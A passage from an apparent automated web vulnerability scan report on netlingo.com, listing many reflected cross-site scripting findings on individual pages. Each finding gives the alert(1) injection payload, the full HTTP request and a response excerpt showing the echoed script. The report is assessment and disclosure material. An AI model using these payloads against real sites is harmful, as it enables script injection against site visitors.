                               data    =    "page_name=/press/all-press-clippings.php?88732"-alert(1)-"9b04fa3131a=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1286. http://www.netlingo.com/press/awards.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/awards.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb457"-alert(1)-"78642e65f3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/awards.php?cb457"-alert(1)-"78642e65f3e=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ttp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/awards.php?cb457"-alert(1)-"78642e65f3e=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1287. http://www.netlingo.com/press/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ead"-alert(1)-"6002bc417dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/index.php?25ead"-alert(1)-"6002bc417dd=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/index.php?25ead"-alert(1)-"6002bc417dd=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1288. http://www.netlingo.com/press/media.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/media.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7494b"-alert(1)-"aca1aad8f53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/media.php?7494b"-alert(1)-"aca1aad8f53=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 69742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/media.php?7494b"-alert(1)-"aca1aad8f53=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1289. http://www.netlingo.com/press/meet-erin.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/meet-erin.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94100"-alert(1)-"4246afee04b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/meet-erin.php?94100"-alert(1)-"4246afee04b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/meet-erin.php?94100"-alert(1)-"4246afee04b=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1290. http://www.netlingo.com/press/print.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/print.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc70"-alert(1)-"b266cbdc811 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/print.php?dcc70"-alert(1)-"b266cbdc811=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 101192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/print.php?dcc70"-alert(1)-"b266cbdc811=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1291. http://www.netlingo.com/press/teen-text-talk.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/teen-text-talk.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0cd2"-alert(1)-"e3f47516864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/teen-text-talk.php?c0cd2"-alert(1)-"e3f47516864=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
w.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/teen-text-talk.php?c0cd2"-alert(1)-"e3f47516864=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1292. http://www.netlingo.com/press/web.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/press/web.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 849cd"-alert(1)-"25cb54c5360 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /press/web.php?849cd"-alert(1)-"25cb54c5360=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 80118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/press/web.php?849cd"-alert(1)-"25cb54c5360=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1293. http://www.netlingo.com/shop/netlingo-the-dictionary.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/netlingo-the-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70646"-alert(1)-"3e8ab8b7fa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shop/netlingo-the-dictionary.php?70646"-alert(1)-"3e8ab8b7fa9=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
go.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/shop/netlingo-the-dictionary.php?70646"-alert(1)-"3e8ab8b7fa9=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1294. http://www.netlingo.com/shop/netlingo-the-list.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/netlingo-the-list.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec45"-alert(1)-"79eca35260a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shop/netlingo-the-list.php?1ec45"-alert(1)-"79eca35260a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/shop/netlingo-the-list.php?1ec45"-alert(1)-"79eca35260a=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1295. http://www.netlingo.com/shop/online-store.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/shop/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1279"-alert(1)-"03ee14891db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shop/online-store.php?c1279"-alert(1)-"03ee14891db=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
/www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/shop/online-store.php?c1279"-alert(1)-"03ee14891db=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1296. http://www.netlingo.com/tips/color-guide.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/color-guide.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b707"-alert(1)-"b4a703bddf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tips/color-guide.php?2b707"-alert(1)-"b4a703bddf1=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
//www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/color-guide.php?2b707"-alert(1)-"b4a703bddf1=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1297. http://www.netlingo.com/tips/cyber-safety-statistics.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/cyber-safety-statistics.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3c88"-alert(1)-"cee57c976f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tips/cyber-safety-statistics.php?e3c88"-alert(1)-"cee57c976f=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
go.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/cyber-safety-statistics.php?e3c88"-alert(1)-"cee57c976f=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1298. http://www.netlingo.com/tips/file-extensions.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/file-extensions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e085"-alert(1)-"e00943c83cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tips/file-extensions.php?8e085"-alert(1)-"e00943c83cd=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 49203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
w.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/file-extensions.php?8e085"-alert(1)-"e00943c83cd=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1299. http://www.netlingo.com/tips/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896a9"-alert(1)-"818a71d9ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tips/index.php?896a9"-alert(1)-"818a71d9ba5=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
'http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/index.php?896a9"-alert(1)-"818a71d9ba5=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1300. http://www.netlingo.com/tips/resources.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/resources.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ce45"-alert(1)-"00082030088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tips/resources.php?8ce45"-alert(1)-"00082030088=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 73613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
p://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/resources.php?8ce45"-alert(1)-"00082030088=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1301. http://www.netlingo.com/tips/webcasts.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tips/webcasts.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31820"-alert(1)-"d58a1ad0998 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tips/webcasts.php?31820"-alert(1)-"d58a1ad0998=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
tp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/webcasts.php?31820"-alert(1)-"d58a1ad0998=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1302. http://www.netlingo.com/tools/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf4cf"-alert(1)-"bdab9c4d654 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tools/index.php?cf4cf"-alert(1)-"bdab9c4d654=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/index.php?cf4cf"-alert(1)-"bdab9c4d654=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1303. http://www.netlingo.com/tools/online-store.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba509"-alert(1)-"fd72fdd2008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tools/online-store.php?ba509"-alert(1)-"fd72fdd2008=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 31833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });

                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/online-store.php?ba509"-alert(1)-"fd72fdd2008=1";
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });
</script>
...[SNIP]...

4.1304. http://www.netlingo.com/tools/pocket-dictionary.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/tools/pocket-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db5a1"-alert(1)-"ae07cad321d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tools/pocket-dictionary.php?db5a1"-alert(1)-"ae07cad321d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
